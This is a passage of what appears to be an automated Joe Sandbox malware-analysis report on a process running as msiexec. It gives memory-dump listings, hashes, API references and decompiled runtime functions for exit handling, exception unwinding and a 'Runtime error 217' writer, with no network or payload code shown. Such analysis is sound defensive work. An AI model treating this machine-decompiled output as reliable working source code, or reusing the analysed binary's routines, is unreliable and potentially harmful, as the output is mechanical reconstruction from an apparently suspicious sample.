0x049d5d4b
0x049d5d4d
0x049d5d4e
0x049d5d4e
0x049d5d47
0x049d5d3a

APIs

Sleep.KERNEL32(00000000,?,?,00000000,049DE430,049DE496,?,00000000,?,?,049DE7F1,00000000,?,00000000,049DECF2,00000000), ref: 049D5DAE
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,049DE430,049DE496,?,00000000,?,?,049DE7F1,00000000,?,00000000,049DECF2), ref: 049D5DC8

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2aea4ece85558e6699f3031ac98723ef5233591a6bf2c8d2587babd198916975
Instruction ID: 888cc97bfced9e7af014c18902d4a8fa5eea007284a7c869832572224780b89e
Opcode Fuzzy Hash: 2aea4ece85558e6699f3031ac98723ef5233591a6bf2c8d2587babd198916975
Instruction Fuzzy Hash: 3F711231200300BFE715DF29C988B16BBD9EF85334F1AC67AD4458B391DB74A841CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 049D98D0, Relevance: 6.2, APIs: 4, Instructions: 159
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E049D98D0(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				void* _t40;
				intOrPtr* _t42;
				char _t48;
				signed int _t49;
				signed int _t50;
				void* _t59;
				void* _t62;
				intOrPtr _t70;
				intOrPtr* _t72;
				void* _t83;
				void* _t89;
				intOrPtr _t96;
				intOrPtr* _t97;
				intOrPtr* _t98;
				void* _t99;
				intOrPtr _t102;
				struct HINSTANCE__* _t104;
				void* _t109;
				void* _t115;
				intOrPtr _t118;
				void* _t119;
				void* _t120;

				_t102 = __edx;
				_t89 = 0x4c92b9c;
				if( *(_t118 + 0xc) >= 2) {
					_t89 = 0x4c92bcc;
				}
				_t115 = _t89;
				_t40 = memcpy(_t118 - 0x40, _t115, 0xc << 2);
				_t120 = _t119 + 0xc;
				_t109 = _t115 + 0x18;
				_pop( *_t4);
				_pop( *_t5);
				_pop( *_t6);
				 *((intOrPtr*)(_t89 + 0x14)) = _t118;
				 *(_t89 + 8) = _t40;
				 *((intOrPtr*)(_t89 + 0x10)) = _t102;
				 *_t89 = _t118 - 0x40;
				 *((intOrPtr*)(_t89 + 0x2c)) = GetCurrentThreadId();
				_t12 = _t89 + 8; // 0x0
				_t42 =  *_t12;
				_t96 = 0;
				if( *(_t118 + 0xc) == 0) {
					_t96 =  *_t42;
				}
				 *((intOrPtr*)(_t89 + 0xc)) = _t96;
				 *0x4c9001c = 0x49d515c;
				 *0x4c90020 = 0x49d5164;
				E049D97B4(_t89);
				_t48 =  *(_t118 + 0xc) + 1;
				 *((char*)(_t89 + 0x28)) = _t48;
				_t49 = _t48 - 1;
				_pop(_t97);
				 *((intOrPtr*)(_t89 + 0x24)) =  *_t97;
				if(_t49 != 0 && _t49 < 3) {
					 *((intOrPtr*)(_t97 + _t49 * 4))();
				}
				_push(_t97);
				_t98 =  *((intOrPtr*)(_t120 + 8));
				if(_t98 != 0) {
					 *_t98();
				}
				_pop(_t99);
				_t50 =  *(_t118 + 0xc);
				if(_t50 >= 3) {
					 *((intOrPtr*)(_t99 + _t50 * 4))();
				}
				if( *0x4c90040 == 0) {
					 *0x4c90048 = 1;
					asm("fnstcw word [0x4c80028]");
				}
				if( *(_t118 + 0xc) != 1) {
					_push(_t89);
					_push(_t115);
					_push(_t109);
					if( *0x4c80004 != 0) {
						E049D9AFC();
						E049D9B84(_t99);
						 *0x4c80004 = 0;
					}
					if( *0x4c92bd0 != 0 && GetCurrentThreadId() ==  *0x4c92bf8) {
						E049D97D4(0x4c92bcc);
						E049D9B58(0x4c92bcc);
					}
					if( *0x04C92BC4 != 0 ||  *0x4c90058 == 0) {
						L23:
						if( *((char*)(0x4c92bc4)) == 2 &&  *0x4c80000 == 0) {
							 *0x04C92BA8 = 0;
						}
						if( *((char*)(0x4c92bc4)) != 0) {
							L29:
							E049D97FC(); // executed
							if( *((char*)(0x4c92bc4)) <= 1 ||  *0x4c80000 != 0) {
								_t54 =  *0x04C92BAC;
								if( *0x04C92BAC != 0) {
									E049DDCFC(_t54);
									_t70 =  *((intOrPtr*)(0x4c92bac));
									_t104 =  *(_t70 + 0x10);
									if(_t104 !=  *((intOrPtr*)(_t70 + 4)) && _t104 != 0) {
										FreeLibrary(_t104);
									}
								}
							}
							E049D97D4(0x4c92b9c);
							if( *((char*)(0x4c92bc4)) == 1) {
								 *0x04C92BC0();
							}
							if( *((char*)(0x4c92bc4)) != 0) {
								E049D9B58(0x4c92b9c);
							}
							if( *0x4c92b9c == 0) {
								if( *0x4c90038 != 0) {
									 *0x4c90038();
								}
								ExitProcess( *0x4c80000);
							}
							memcpy(0x4c92b9c,  *0x4c92b9c, 0xc << 2);
							_t120 = _t120 + 0xc;
							0x4c80000 = 0x4c80000;
							0x4c92b9c = 0x4c92b9c;
							goto L23;
						} else {
							_t59 = E049D6F7C();
							_t90 = _t59;
							if(_t59 == 0) {
								goto L29;
							} else {
								goto L28;
							}
							do {
								L28:
								E049D8004(_t90);
								_t62 = E049D6F7C();
								_t90 = _t62;
							} while (_t62 != 0);
							goto L29;
						}
					} else {
						do {
							_t72 =  *0x4c90058; // 0x49f48dc
							 *0x4c90058 = 0;
							 *_t72();
						} while ( *0x4c90058 != 0);
						L23:
						while(1) {
						}
					}
				} else {
					_t83 = E049D9864(); // executed
					return _t83;
				}
			}

0x049d98d0
0x049d98d4
0x049d98dd
0x049d98df
0x049d98df
0x049d98e4
0x049d98ee
0x049d98ee
0x049d98ee
0x049d98f0
0x049d98f3
0x049d98f6
0x049d98f9
0x049d98fc
0x049d98ff
0x049d9905
0x049d990c
0x049d990f
0x049d990f
0x049d9912
0x049d9918
0x049d991a
0x049d991a
0x049d991c
0x049d9924
0x049d992e
0x049d9935
0x049d993d
0x049d993e
0x049d9941
0x049d9942
0x049d9945
0x049d9948
0x049d994e
0x049d994e
0x049d9951
0x049d9952
0x049d9958
0x049d9960
0x049d9960
0x049d9962
0x049d9963
0x049d9968
0x049d996a
0x049d996a
0x049d9974
0x049d9976
0x049d997d
0x049d997d
0x049d9987
0x049d9c1c
0x049d9c1d
0x049d9c1e
0x049d9c30
0x049d9c32
0x049d9c37
0x049d9c3e
0x049d9c3e
0x049d9c4a
0x049d9c5e
0x049d9c68
0x049d9c68
0x049d9c71
0x049d9c95
0x049d9c99
0x049d9ca2
0x049d9ca2
0x049d9ca9
0x049d9cc8
0x049d9cc8
0x049d9cd1
0x049d9cd8
0x049d9cdd
0x049d9cdf
0x049d9ce4
0x049d9ce7
0x049d9ced
0x049d9cf4
0x049d9cf4
0x049d9ced
0x049d9cdd
0x049d9cfb
0x049d9d04
0x049d9d06
0x049d9d06
0x049d9d0d
0x049d9d11
0x049d9d11
0x049d9d19
0x049d9d22
0x049d9d24
0x049d9d24
0x049d9d2d
0x049d9d2d
0x049d9d3f
0x049d9d3f
0x049d9d41
0x049d9d42
0x00000000
0x049d9cab
0x049d9cab
0x049d9cb0
0x049d9cb4
0x00000000
0x00000000
0x00000000
0x00000000
0x049d9cb6
0x049d9cb6
0x049d9cb8
0x049d9cbd
0x049d9cc2
0x049d9cc4
0x00000000
0x049d9cb6
0x049d9c7c
0x049d9c7c
0x049d9c7c
0x049d9c85
0x049d9c8a
0x049d9c8c
0x00000000
0x049d9c95
0x00000000
0x049d9c95
0x049d998d
0x049d998d
0x049d9992
0x049d9992

APIs

GetCurrentThreadId.KERNEL32 ref: 049D9907

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: be11fe7d0dbb68c5a186be0d0de7931b6350fe6af79e6ddfc5db3ee63f79a7cd
Instruction ID: e53ad5eceadd81602b6eb302881e0d33b3ac3576d280b6395234eaba2d8aacdd
Opcode Fuzzy Hash: be11fe7d0dbb68c5a186be0d0de7931b6350fe6af79e6ddfc5db3ee63f79a7cd
Instruction Fuzzy Hash: 8F516BF4600241AFEB24FF79C48875A77E9EB89328F14C579E84A8B241DB74F884CB54

Uniqueness

Uniqueness Score: -1.00%

Function 049D92FE, Relevance: 4.6, APIs: 3, Instructions: 124
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E049D92FE(void* __ebx, long __edi, void* __esi, void* __ebp, struct _EXCEPTION_POINTERS _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v44;
				struct _EXCEPTION_RECORD* _t31;
				long _t34;
				long _t35;
				struct _EXCEPTION_RECORD* _t36;
				intOrPtr* _t38;
				long _t42;
				long _t44;
				long _t45;
				void* _t46;
				intOrPtr* _t47;
				void* _t51;
				long _t52;
				void* _t55;
				intOrPtr _t57;
				long* _t58;
				long _t64;
				intOrPtr* _t67;
				intOrPtr* _t69;
				long _t70;
				void* _t73;
				long* _t74;
				void* _t76;
				long _t77;
				intOrPtr _t80;

				_t76 = __ebp;
				_t73 = __esi;
				_t70 = __edi;
				_t51 = __ebx;
				_t31 = _a4.ExceptionRecord;
				if((_t31->ExceptionFlags & 0x00000006) == 0) {
					if(_t31->ExceptionCode == 0xeedfade) {
						_t34 =  *(_t31->ExceptionInformation[1]);
						goto L6;
					} else {
						asm("cld");
						E049D7D90(_t31);
						_t69 =  *0x4c90014; // 0x0
						if(_t69 != 0) {
							_t34 =  *_t69();
							if(_t34 != 0) {
								L6:
								_push(_t51);
								_push(_t73);
								_push(_t70);
								_push(_t76);
								_t57 =  *((intOrPtr*)(_a8 + 4));
								_t52 =  *(_t57 + 5);
								_t9 = _t57 + 9; // 0xf
								_t74 = _t9;
								_t77 = _t34;
								while(1) {
									L7:
									_t35 =  *_t74;
									__eflags = _t35;
									if(_t35 == 0) {
										break;
									}
									_t70 = _t77;
									while(1) {
										_t46 =  *_t35;
										__eflags = _t46 - _t70;
										if(_t46 == _t70) {
											goto L17;
										}
										__eflags =  *((intOrPtr*)(_t46 - 0x34)) -  *((intOrPtr*)(_t70 - 0x34));
										if( *((intOrPtr*)(_t46 - 0x34)) !=  *((intOrPtr*)(_t70 - 0x34))) {
											L14:
											_t70 =  *(_t70 - 0x30);
											_t35 =  *_t74;
											__eflags = _t70;
											if(_t70 != 0) {
												_t70 =  *_t70;
												continue;
											} else {
												_t74 =  &(_t74[2]);
												_t52 = _t52 - 1;
												__eflags = _t52;
												if(_t52 != 0) {
													goto L7;
												} else {
												}
											}
										} else {
											_t47 =  *((intOrPtr*)(_t46 - 0x38));
											_t67 =  *((intOrPtr*)(_t70 - 0x38));
											_t62 =  *_t47;
											__eflags =  *_t47 -  *_t67;
											if( *_t47 !=  *_t67) {
												goto L14;
											} else {
												__eflags = _t67 + 1;
												E049DA57C(_t47 + 1, _t62, _t67 + 1);
												if(__eflags == 0) {
													goto L17;
												} else {
													goto L14;
												}
											}
										}
										goto L26;
									}
									break;
								}
								L17:
								_t36 = _a4.ExceptionRecord;
								__eflags = _t36->ExceptionCode - 0xeedfade;
								_t64 = _t36->ExceptionInformation[1];
								_t58 = _t36->ExceptionInformation;
								if(_t36->ExceptionCode == 0xeedfade) {
									__eflags =  *0x4c80031 - 1;
									if( *0x4c80031 <= 1) {
										goto L25;
									}
									__eflags =  *0x4c80030;
									if( *0x4c80030 > 0) {
										goto L25;
									}
									_t42 = UnhandledExceptionFilter( &_a4);
									__eflags = _t42;
									_t58 = _t58;
									_t64 = _t64;
									_t36 = _t36;
									if(_t42 != 0) {
										goto L25;
									}
								} else {
									_t44 = E049D90EC( *0x4c90018(), _a12, _t70);
									__eflags =  *0x4c80031;
									if( *0x4c80031 <= 0) {
										L21:
										_t64 = _t44;
										_t36 = _a4.ExceptionRecord;
										_t58 = _t36->ExceptionAddress;
										L25:
										_t36->ExceptionFlags = _t36->ExceptionFlags | 0x00000002;
										 *0x4c90020(_a8, 0x49d9434, _t36, 0, _t74, _t58, _t64, _t36,  *[fs:ebx]); // executed
										_pop(_t55);
										_t38 = E049E0904();
										_push( *_t38);
										 *_t38 = _t80;
										 *((intOrPtr*)(_v8 + 4)) = E049D9460;
										E049D9128(_v44, _t55, _t74);
										goto ( *((intOrPtr*)(_t55 + 4)));
									}
									__eflags =  *0x4c80030;
									if( *0x4c80030 > 0) {
										goto L21;
									}
									_t45 = UnhandledExceptionFilter( &_a4);
									__eflags = _t45;
									_t44 = _t44;
									if(_t45 != 0) {
										goto L21;
									}
								}
							} else {
							}
						}
					}
				}
				L26:
				return 1;
			}

0x049d92fe
0x049d92fe
0x049d92fe
0x049d92fe
0x049d9300
0x049d930b
0x049d9317
0x049d933b
0x00000000
0x049d9319
0x049d9319
0x049d931a
0x049d931f
0x049d9327
0x049d932d
0x049d9331
0x049d933d
0x049d9341
0x049d9342
0x049d9343
0x049d9344
0x049d9345
0x049d9348
0x049d934b
0x049d934b
0x049d934e
0x049d9350
0x049d9350
0x049d9350
0x049d9352
0x049d9354
0x00000000
0x00000000
0x049d9356
0x049d935c
0x049d935c
0x049d935e
0x049d9360
0x00000000
0x00000000
0x049d9365
0x049d9368
0x049d9381
0x049d9381
0x049d9384
0x049d9386
0x049d9388
0x049d935a
0x00000000
0x049d938a
0x049d938a
0x049d938d
0x049d938d
0x049d938e
0x00000000
0x049d9390
0x049d9393
0x049d938e
0x049d936a
0x049d936a
0x049d936d
0x049d9372
0x049d9374
0x049d9376
0x00000000
0x049d9378
0x049d9379
0x049d937a
0x049d937f
0x00000000
0x00000000
0x00000000
0x00000000
0x049d937f
0x049d9376
0x00000000
0x049d9368
0x00000000
0x049d935c
0x049d9399
0x049d9399
0x049d939d
0x049d93a3
0x049d93a6
0x049d93a9
0x049d93ec
0x049d93f3
0x00000000
0x00000000
0x049d93f5
0x049d93fc
0x00000000
0x00000000
0x049d9406
0x049d940b
0x049d940e
0x049d940f
0x049d9410
0x049d9411
0x00000000
0x00000000
0x049d93ab
0x049d93b5
0x049d93ba
0x049d93c1
0x049d93e1
0x049d93e1
0x049d93e3
0x049d93e7
0x049d9413
0x049d9420
0x049d942e
0x049d9434
0x049d9439
0x049d943e
0x049d9444
0x049d944d
0x049d9458
0x049d945d
0x049d945d
0x049d93c3
0x049d93ca
0x00000000
0x00000000
0x049d93d2
0x049d93d7
0x049d93da
0x049d93db
0x00000000
0x00000000
0x049d93db
0x00000000
0x049d9333
0x049d9331
0x049d9327
0x049d9317
0x049d9480
0x049d9485

APIs

UnhandledExceptionFilter.KERNEL32(?,00000000), ref: 049D93D2
RtlUnwind.NTDLL(?,049D9434,?,00000000,0000000F,?,?,?,?), ref: 049D942E

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: ExceptionFilterUnhandledUnwind
String ID:
API String ID: 2354489195-0
Opcode ID: bc21d632f7c17709d7a0710ac75e27798eca75d6f2adfd477c37189d9683b756
Instruction ID: 0e16edfbc208618154cf60b83cf0028ddf24ebf6cc0c40e105e22f09dec3ec29
Opcode Fuzzy Hash: bc21d632f7c17709d7a0710ac75e27798eca75d6f2adfd477c37189d9683b756
Instruction Fuzzy Hash: 00417DB5604201AFD720EF55D884B6AB7E9EF88358F19C579E4488B262D730FC85CB61

Uniqueness

Uniqueness Score: -1.00%

Function 049D9C14, Relevance: 4.6, APIs: 3, Instructions: 95
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E049D9C14() {
				intOrPtr* _t14;
				void* _t23;
				void* _t26;
				intOrPtr _t34;
				intOrPtr* _t36;
				void* _t50;
				struct HINSTANCE__* _t53;
				void* _t62;

				 *((intOrPtr*)(_t14 +  *_t14)) =  *((intOrPtr*)(_t14 +  *_t14)) + _t14 +  *_t14;
				if( *0x4c80004 != 0) {
					E049D9AFC();
					E049D9B84(_t50);
					 *0x4c80004 = 0;
				}
				if( *0x4c92bd0 != 0 && GetCurrentThreadId() ==  *0x4c92bf8) {
					E049D97D4(0x4c92bcc);
					E049D9B58(0x4c92bcc);
				}
				if( *0x04C92BC4 != 0 ||  *0x4c90058 == 0) {
					L9:
					if( *((char*)(0x4c92bc4)) == 2 &&  *0x4c80000 == 0) {
						 *0x04C92BA8 = 0;
					}
					if( *((char*)(0x4c92bc4)) != 0) {
						L15:
						E049D97FC(); // executed
						if( *((char*)(0x4c92bc4)) <= 1 ||  *0x4c80000 != 0) {
							_t18 =  *0x04C92BAC;
							if( *0x04C92BAC != 0) {
								E049DDCFC(_t18);
								_t34 =  *((intOrPtr*)(0x4c92bac));
								_t53 =  *(_t34 + 0x10);
								if(_t53 !=  *((intOrPtr*)(_t34 + 4)) && _t53 != 0) {
									FreeLibrary(_t53);
								}
							}
						}
						E049D97D4(0x4c92b9c);
						if( *((char*)(0x4c92bc4)) == 1) {
							 *0x04C92BC0();
						}
						if( *((char*)(0x4c92bc4)) != 0) {
							E049D9B58(0x4c92b9c);
						}
						if( *0x4c92b9c == 0) {
							if( *0x4c90038 != 0) {
								 *0x4c90038();
							}
							ExitProcess( *0x4c80000);
						}
						memcpy(0x4c92b9c,  *0x4c92b9c, 0xc << 2);
						_t62 = _t62 + 0xc;
						0x4c80000 = 0x4c80000;
						0x4c92b9c = 0x4c92b9c;
						goto L9;
					} else {
						_t23 = E049D6F7C();
						_t48 = _t23;
						if(_t23 == 0) {
							goto L15;
						} else {
							goto L14;
						}
						do {
							L14:
							E049D8004(_t48);
							_t26 = E049D6F7C();
							_t48 = _t26;
						} while (_t26 != 0);
						goto L15;
					}
				} else {
					do {
						_t36 =  *0x4c90058; // 0x49f48dc
						 *0x4c90058 = 0;
						 *_t36();
					} while ( *0x4c90058 != 0);
					L9:
					while(1) {
					}
				}
			}

0x049d9c16
0x049d9c30
0x049d9c32
0x049d9c37
0x049d9c3e
0x049d9c3e
0x049d9c4a
0x049d9c5e
0x049d9c68
0x049d9c68
0x049d9c71
0x049d9c95
0x049d9c99
0x049d9ca2
0x049d9ca2
0x049d9ca9
0x049d9cc8
0x049d9cc8
0x049d9cd1
0x049d9cd8
0x049d9cdd
0x049d9cdf
0x049d9ce4
0x049d9ce7
0x049d9ced
0x049d9cf4
0x049d9cf4
0x049d9ced
0x049d9cdd
0x049d9cfb
0x049d9d04
0x049d9d06
0x049d9d06
0x049d9d0d
0x049d9d11
0x049d9d11
0x049d9d19
0x049d9d22
0x049d9d24
0x049d9d24
0x049d9d2d
0x049d9d2d
0x049d9d3f
0x049d9d3f
0x049d9d41
0x049d9d42
0x00000000
0x049d9cab
0x049d9cab
0x049d9cb0
0x049d9cb4
0x00000000
0x00000000
0x00000000
0x00000000
0x049d9cb6
0x049d9cb6
0x049d9cb8
0x049d9cbd
0x049d9cc2
0x049d9cc4
0x00000000
0x049d9cb6
0x049d9c7c
0x049d9c7c
0x049d9c7c
0x049d9c85
0x049d9c8a
0x049d9c8c
0x00000000
0x049d9c95
0x00000000
0x049d9c95

APIs

GetCurrentThreadId.KERNEL32 ref: 049D9C4C
FreeLibrary.KERNEL32(?,?,?,?,049D9D56,049D6FC7,049D700E,?,?,049D7027,?,?,?,?,04AA8046,00000000), ref: 049D9CF4
ExitProcess.KERNEL32(00000000,?,?,?,049D9D56,049D6FC7,049D700E,?,?,049D7027,?,?,?,?,04AA8046,00000000), ref: 049D9D2D

Part of subcall function 049D9B84: GetStdHandle.KERNEL32(000000F5,Runtime error 217 at 04BE070B,0000001D,?,00000000,?,049D9C3C,?,?,?,049D9D56,049D6FC7,049D700E,?,?,049D7027), ref: 049D9BBD
Part of subcall function 049D9B84: WriteFile.KERNEL32(00000000,000000F5,Runtime error 217 at 04BE070B,0000001D,?,00000000,?,049D9C3C,?,?,?,049D9D56,049D6FC7,049D700E,?,?), ref: 049D9BC3
Part of subcall function 049D9B84: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error 217 at 04BE070B,0000001D,?,00000000,?,049D9C3C,?,?,?), ref: 049D9BDE
Part of subcall function 049D9B84: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error 217 at 04BE070B,0000001D,?,00000000,?,049D9C3C,?,?), ref: 049D9BE4

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID:
API String ID: 3490077880-0
Opcode ID: d8557e9d41133f17c35800700d589a4d89ef7739c591cbfdf62ca13475ca15d6
Instruction ID: 3dac58b11df990c2ba67c85d85db2d8df28715c45b589587e7fae8f74d0db15a
Opcode Fuzzy Hash: d8557e9d41133f17c35800700d589a4d89ef7739c591cbfdf62ca13475ca15d6
Instruction Fuzzy Hash: 7E318BE4600781AEEB31BF7AC48875A77E99F8A328F15C879D44A87150DB78F888C711

Uniqueness

Uniqueness Score: -1.00%

Function 049D9C1C, Relevance: 4.6, APIs: 3, Instructions: 93
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E049D9C1C() {
				void* _t20;
				void* _t23;
				intOrPtr _t31;
				intOrPtr* _t33;
				void* _t46;
				struct HINSTANCE__* _t49;
				void* _t56;

				if( *0x4c80004 != 0) {
					E049D9AFC();
					E049D9B84(_t46);
					 *0x4c80004 = 0;
				}
				if( *0x4c92bd0 != 0 && GetCurrentThreadId() ==  *0x4c92bf8) {
					E049D97D4(0x4c92bcc);
					E049D9B58(0x4c92bcc);
				}
				if( *0x04C92BC4 != 0 ||  *0x4c90058 == 0) {
					L8:
					if( *((char*)(0x4c92bc4)) == 2 &&  *0x4c80000 == 0) {
						 *0x04C92BA8 = 0;
					}
					if( *((char*)(0x4c92bc4)) != 0) {
						L14:
						E049D97FC(); // executed
						if( *((char*)(0x4c92bc4)) <= 1 ||  *0x4c80000 != 0) {
							_t15 =  *0x04C92BAC;
							if( *0x04C92BAC != 0) {
								E049DDCFC(_t15);
								_t31 =  *((intOrPtr*)(0x4c92bac));
								_t49 =  *(_t31 + 0x10);
								if(_t49 !=  *((intOrPtr*)(_t31 + 4)) && _t49 != 0) {
									FreeLibrary(_t49);
								}
							}
						}
						E049D97D4(0x4c92b9c);
						if( *((char*)(0x4c92bc4)) == 1) {
							 *0x04C92BC0();
						}
						if( *((char*)(0x4c92bc4)) != 0) {
							E049D9B58(0x4c92b9c);
						}
						if( *0x4c92b9c == 0) {
							if( *0x4c90038 != 0) {
								 *0x4c90038();
							}
							ExitProcess( *0x4c80000);
						}
						memcpy(0x4c92b9c,  *0x4c92b9c, 0xc << 2);
						_t56 = _t56 + 0xc;
						0x4c80000 = 0x4c80000;
						0x4c92b9c = 0x4c92b9c;
						goto L8;
					} else {
						_t20 = E049D6F7C();
						_t44 = _t20;
						if(_t20 == 0) {
							goto L14;
						} else {
							goto L13;
						}
						do {
							L13:
							E049D8004(_t44);
							_t23 = E049D6F7C();
							_t44 = _t23;
						} while (_t23 != 0);
						goto L14;
					}
				} else {
					do {
						_t33 =  *0x4c90058; // 0x49f48dc
						 *0x4c90058 = 0;
						 *_t33();
					} while ( *0x4c90058 != 0);
					L8:
					while(1) {
					}
				}
			}

0x049d9c30
0x049d9c32
0x049d9c37
0x049d9c3e
0x049d9c3e
0x049d9c4a
0x049d9c5e
0x049d9c68
0x049d9c68
0x049d9c71
0x049d9c95
0x049d9c99
0x049d9ca2
0x049d9ca2
0x049d9ca9
0x049d9cc8
0x049d9cc8
0x049d9cd1
0x049d9cd8
0x049d9cdd
0x049d9cdf
0x049d9ce4
0x049d9ce7
0x049d9ced
0x049d9cf4
0x049d9cf4
0x049d9ced
0x049d9cdd
0x049d9cfb
0x049d9d04
0x049d9d06
0x049d9d06
0x049d9d0d
0x049d9d11
0x049d9d11
0x049d9d19
0x049d9d22
0x049d9d24
0x049d9d24
0x049d9d2d
0x049d9d2d
0x049d9d3f
0x049d9d3f
0x049d9d41
0x049d9d42
0x00000000
0x049d9cab
0x049d9cab
0x049d9cb0
0x049d9cb4
0x00000000
0x00000000
0x00000000
0x00000000
0x049d9cb6
0x049d9cb6
0x049d9cb8
0x049d9cbd
0x049d9cc2
0x049d9cc4
0x00000000
0x049d9cb6
0x049d9c7c
0x049d9c7c
0x049d9c7c
0x049d9c85
0x049d9c8a
0x049d9c8c
0x00000000
0x049d9c95
0x00000000
0x049d9c95

APIs

GetCurrentThreadId.KERNEL32 ref: 049D9C4C
FreeLibrary.KERNEL32(?,?,?,?,049D9D56,049D6FC7,049D700E,?,?,049D7027,?,?,?,?,04AA8046,00000000), ref: 049D9CF4
ExitProcess.KERNEL32(00000000,?,?,?,049D9D56,049D6FC7,049D700E,?,?,049D7027,?,?,?,?,04AA8046,00000000), ref: 049D9D2D

Part of subcall function 049D9B84: GetStdHandle.KERNEL32(000000F5,Runtime error 217 at 04BE070B,0000001D,?,00000000,?,049D9C3C,?,?,?,049D9D56,049D6FC7,049D700E,?,?,049D7027), ref: 049D9BBD
Part of subcall function 049D9B84: WriteFile.KERNEL32(00000000,000000F5,Runtime error 217 at 04BE070B,0000001D,?,00000000,?,049D9C3C,?,?,?,049D9D56,049D6FC7,049D700E,?,?), ref: 049D9BC3
Part of subcall function 049D9B84: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error 217 at 04BE070B,0000001D,?,00000000,?,049D9C3C,?,?,?), ref: 049D9BDE
